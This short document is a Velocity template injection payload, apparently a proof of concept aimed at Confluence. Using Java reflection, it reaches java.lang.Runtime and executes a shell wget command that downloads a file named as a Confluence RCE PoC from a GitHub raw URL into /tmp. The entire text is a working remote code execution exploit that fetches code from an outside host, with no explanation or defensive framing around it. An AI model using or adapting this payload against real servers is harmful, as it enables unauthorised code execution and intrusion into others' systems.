#set($e="e")
$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("wget -P /tmp https://raw.githubusercontent.com/Pd1r/Poc/master/confluence_rce_poc.vm",null,null).toString();
